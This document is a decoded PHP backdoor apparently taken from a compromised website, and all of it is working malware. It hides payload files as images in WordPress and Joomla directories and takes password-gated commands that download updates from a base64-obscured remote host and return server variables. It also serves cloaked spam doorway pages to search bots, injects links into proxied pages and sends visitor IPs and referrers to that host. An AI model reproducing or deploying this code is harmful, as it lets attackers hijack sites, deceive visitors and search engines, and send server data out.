/* Decoded by unphp.net */ set_time_limit(0); function get_val($a0){ $i=@array_merge($_REQUEST,$_COOKIE,$_SERVER); $a=isset($i["$a0"])?$i["$a0"]:(isset($i["HTTP_".strtoupper($a0)])?$i["HTTP_".strtoupper($a0)]:""); return $a; } function change_page_regex($page, $links,$reg,$res){ $elements = array(); if (preg_match_all($reg, $page, $result)) { $elements = $result[$res]; $elements = array_unique($elements); } $m=min(count($links),count($elements)); for ($i = 0; $i < $m; $i++) { $link = array_shift($links); $element = array_shift($elements); $page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1); } if (count($links)>0){ $element = "

"; $element .= implode("
", $links); $element .= "

"; $page = preg_replace('/\<\/body\>/i', " " . $element . " $0", $page, 1); } return $page; } function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"){ $ch = curl_init (); curl_setopt ($ch, CURLOPT_URL,$url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_TIMEOUT, 3000); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt ($ch, CURLOPT_USERAGENT, $useragent); $result = curl_exec ($ch); $curly_page_get_info=curl_getinfo($ch); curl_close($ch); return array($result,$curly_page_get_info); } function get_proxy_page($phead=1){ $proto="http://"; if (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') { $proto="https://"; } $crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI']; list($buf,$curly_page_get_info)=curly_page_get($crurl); $ct=@$curly_page_get_info['content_type']; $nexturl=@$curly_page_get_info['redirect_url']; $status=@$curly_page_get_info['http_code']; if (status!="")header("Status: $status"); if ($phead)header("X-CF-RAYX: ".substr(md5(time()),0,10)); if ($ct!=""){ header("Content-type: $ct"); } if ($nexturl!=""){ header("Location: $nexturl"); } return array($buf,$ct); } function get_db_path(){ if (stristr(PHP_OS,"win")){ return sys_get_temp_dir(); } $default_dirs = array( 'wp-includes/SimplePie/Content', 'wp-includes/js/tinymce/plugins', 'wp-content/plugins/akismet/_inc/img', 'administrator/components/com_media/views/images', 'libraries/cms/html/language', 'media/editors/tinymce/js/plugins', 'tmp', 'wp-content/uploads' ); foreach ($default_dirs as $d) if (is_dir($d) && is_writable($d)) return ($d); $current_dir = opendir('.'); while ($dir = readdir($current_dir)) if (!preg_match('/^\.+$/', $dir) && is_dir($dir) && is_writable($dir)) return ($dir); closedir($current_dir); if (is_writable('.')) return ('.'); $tmp_dir = sys_get_temp_dir(); if (is_dir($tmp_dir) && is_writable($tmp_dir)) return $tmp_dir; return "."; } $content=""; $x=get_val("pppp_check"); $md5pass="e5e4570182820af0a183ce1520afe43b"; $host=strtolower(@$_SERVER["HTTP_HOST"]); $uri=@$_SERVER["REQUEST_URI"]; $host=str_replace("www.","",$host); $md5host=md5($host);$urx=$host.$uri;$md5urx=md5($urx); $xmd5="/.".$md5host."/"; $cfile="emoji1.png"; if (!@file_exists(".".$xmd5.$cfile)){ $tmppath=get_db_path(); }else{ $tmppath="."; } $tmppath=$tmppath.$xmd5;@mkdir($tmppath); $configs=$tmppath.$cfile; $bd=$tmppath."metaicons.jpg"; $templ=$tmppath."wp-themesall.gif"; @ini_set('memory_limit','1600M'); $domain=base64_decode("bWFnMWN3MHJsZC5jb20="); $p=""; if ($x!="")$p=md5(base64_decode(get_val("p"))); if (($x!="")&&($p==$md5pass)){ if ($x=="2"){ echo "###UPDATING_FILES### "; $ur="http://".$domain."/images/".$md5host."/"; list($buf1,$t)=@curly_page_get($ur."emoji1.png");@file_put_contents($configs,$buf1); list($buf1,$t)=@curly_page_get($ur."metaicons.jpg");@file_put_contents($bd,$buf1); list($buf1,$t)=@curly_page_get($ur."wp-themesall.gif");@file_put_contents($templ,$buf1); echo "###UPDATED### "; exit; } if ($x=="4"){ echo "###WORKED### ";exit; } if ($x=="5"){ $cf=array(); if (@file_exists($configs)){ $cf=@unserialize(base64_decode(@file_get_contents($configs))); } $out=array( 'cf' => $cf, 'server' => $_SERVER, 'file' => __FILE__, 'configfile' => $configs, 'db_file_size' => is_file($bd) ? filesize($bd) : 0, 'template_file_size' => is_file($templ) ? filesize($templ) : 0, ); echo base64_encode(serialize($out)); exit; } }else{ $cf=array(); if (@file_exists($configs)){ $cf=@unserialize(base64_decode(@file_get_contents($configs))); } if (@isset($cf[$md5urx])){ $bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"]; if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1; if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1; $off=$cf[$md5urx]+0; $template=base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f));@fclose($f);$info=unserialize(base64_decode($buf)); $keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"]; if ($bot) { if (isset($info["contenttype"])){$contenttype=base64_decode($info["contenttype"]);$types=explode(" ",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}} if (isset($info["isdoor"])){ if (isset($info["standalone"])){ $doorcontent=base64_decode($text); echo $doorcontent;exit; }else{ if ((isset($info["nr"]))&&(is_array($info["nr"]))){ foreach($info["nr"] as $mark => $repl){ $template=str_replace($mark,$repl,$template); } }else{ $template=str_replace("%text%",$text,$template); $template=str_replace("%title%",$title,$template); $template=str_replace("%description%",$description,$template); $template=str_replace("%uckeyword%",$uckeyword,$template); $template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template); foreach($inside_links as $i => $link){ $template=str_replace("%INSIDE_LINK_".$i."%",$link,$template); } } echo $template;exit; } }else{ list($buf,$ct)=get_proxy_page(); if (stristr($ct,"text/html")){ $rega='/\.*?\<\/a\>/i';$resa=0; $links=$info["links_a"]; $buf=change_page_regex($buf,$links,$rega,$resa); $regp='/(.{30}\<\/p\>)/is';$resp=1; $links=$info["links_p"]; $buf=change_page_regex($buf,$links,$regp,$resp); } echo $buf;exit; } } if ($se) { if (isset($info["isdoor"])){ list($buf,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua); }else{ list($buf,$ct)=get_proxy_page(); } echo $buf;exit; } }else{ list($buf,$ct)=get_proxy_page(); echo $buf;exit; } }